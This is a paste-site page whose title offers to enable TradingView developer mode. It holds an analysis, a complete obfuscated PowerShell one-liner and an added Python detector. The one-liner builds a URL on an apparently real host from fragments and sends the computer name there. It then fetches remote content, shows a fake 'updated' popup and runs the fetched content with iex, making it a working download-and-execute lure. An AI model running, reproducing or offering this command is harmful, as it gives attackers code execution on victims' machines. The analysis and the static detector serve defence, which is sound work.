Enable TradingView Developer Mode (Command Prompt)

TradingView Dec 16, 2024 Never 65
Plaintext Developer Mode 1 lines (1 loc) | 622 Bytes
This PowerShell code appears to be a malicious script that downloads content from a remote server and executes it on the system. Here is a breakdown of its functionality:

1. The script sets multiple variables, building the target URL from short string fragments:
   - `$launch='launch'`
   - `$update='update'`
   - `$TWDesktop='dlr'+'.com'`
   - `$flow='flow'`
   - `$ai='htt'`
   - `$model='ps://ea'`
   - `$dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername`
2. It sets the security protocol to TLS 1.2:
   - `[nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12`
3. It then makes a web request to the URL stored in the `$dev` variable using `iwr` (Invoke-WebRequest) and stores the response in `$done`:
   - `$done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'`
4. It creates a message box using `WScript.Shell` with the message "TradingView Desktop updated!":
   - `$command=New-Object -ComObject Wscript.Shell`
   - `$status='TradingView Desktop '+$update+'d!'`
   - `$command.Popup($status,180,'Success',0x0)`
5. Finally, it executes the result of the web request with `iex` (Invoke-Expression):
   - `iex $done;`

This script reaches out to a potentially malicious URL, fetches the content, and executes it on the system. The URL also carries the local computer name (`$env:computername`) in the `compName` parameter, so the server learns which host made the request. The use of `Invoke-Expression` (`iex`) with the result of a web request is a common technique used by attackers to download and run malicious code on the victim's system. It is strongly advised not to run this script as it poses a security risk to the system.
powershell -c "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; $dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; [nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'; $command=New-Object -ComObject Wscript.Shell; $status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"
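The following is an added example, not part of the original paste: a static check, in Python, that folds the `'a'+'b'` string fragments back together without running anything and reports any URL whose `iwr` response is later handed to `iex`. The sample command, the `example.invalid` host and all function names are constructed for illustration.

```python
import re

# Constructed sample shaped like the paste; the host is a placeholder, not the page's.
SAMPLE = ("$a='htt'; $b='ps://ex'; $h='ample'+'.invalid'; $p='launch'; "
          "$u=$a+$b+$h+'/flow/'+$p+'.php?compName='+$env:computername; "
          "$r= iwr $u -UseBasicParsing -UserAgent 'Mozilla/5.0 (X11; test)'; "
          "$s=New-Object -ComObject Wscript.Shell; "
          "$s.Popup('done',180,'Success',0x0); iex $r;")

TERM_SRC = r"(?:'[^']*'|\$(?:env:)?\w+)"
STMT = re.compile(r"(?:'[^']*'|[^;'])+")           # split on ';' outside quotes
ASSIGN = re.compile(r"^\$(\w+)\s*=\s*(.+)$", re.S)
CHAIN = re.compile(rf"^{TERM_SRC}(?:\s*\+\s*{TERM_SRC})*$")
TERM = re.compile(r"'([^']*)'|\$((?:env:)?\w+)")
FETCH = re.compile(r"^(?:iwr|invoke-webrequest|irm|invoke-restmethod)\b", re.I)
EXEC = re.compile(r"^(?:iex|invoke-expression)\s+\$(\w+)", re.I)

def fold(expr, env):
    """Concatenate literals and known variables; unknowns become <name>."""
    return "".join(env.get(var.lower(), f"<{var}>") if var else lit
                   for lit, var in TERM.findall(expr))

def defang(url):
    """Make the URL non-clickable for reports and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def analyze(script):
    """Return defanged URLs whose response is later passed to iex."""
    env, fetched, findings = {}, {}, []
    for stmt in (s.strip() for s in STMT.findall(script)):
        m = ASSIGN.match(stmt)
        if m:
            name, rhs = m.group(1).lower(), m.group(2).strip()
            if CHAIN.match(rhs):
                env[name] = fold(rhs, env)          # string-building assignment
            elif FETCH.match(rhs):
                arg = re.search(r"'[^']*'|\$\w+", rhs)
                fetched[name] = fold(arg.group(0), env) if arg else "<unknown>"
            continue
        m = EXEC.match(stmt)
        if m and m.group(1).lower() in fetched:     # fetched content is executed
            findings.append(defang(fetched[m.group(1).lower()]))
    return findings

if __name__ == "__main__":
    for url in analyze(SAMPLE):
        print("download-and-execute:", url)
```

Values that only exist at run time, such as `$env:computername`, are left as `<name>` placeholders in the reported URL.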